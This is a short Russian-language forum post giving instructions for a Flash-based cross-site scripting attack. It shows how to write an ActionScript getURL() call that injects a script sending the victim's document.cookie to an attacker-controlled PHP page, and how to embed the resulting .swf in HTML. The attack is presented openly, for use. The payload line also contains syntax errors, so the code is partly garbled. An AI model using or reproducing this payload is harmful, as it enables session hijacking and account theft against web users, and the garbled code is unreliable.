SeeJay
Тебе понадобится Flash-редактор "Marcomedia Flash" версии 8 или более, а так же браузер с установленным flash-плагином. С помощью Flash-ролика заставим браузер выполнить простейший JS-код:
Открой Macromedia Flash и создай новый ролик. В первом кадре нарисуй что угодно. Затем на линии кадров кликни правой кнопкой мыши на первом кадре и, в появившемся меню, выбери пункт "Actions". Внизу появится текстовое поле для AS-кода. В этом поле ты должен вписать код который вызовет выполнение JS-сценария.
Сделать это можно с помощью функции getURL() которой в виде единственного параметра нужно передать следующую
строку: "javascript
:код". У тебя должна получится всего одна строка следующего содержания:
getURL("javascript:alert('Flash XSS!')");
в твоем случае это:
getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='java script';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");
Сохрани полученный Flash-ролик в какой-либо папке, опубликуй (меню File->Publish) и в ней же создай html-файл следующего содержания:
<object>
<embed src="ФЛЕШКА.swf" type="application/x-shockwave-flash" />
</object>
поидее должно работать) главное не падай в минуса..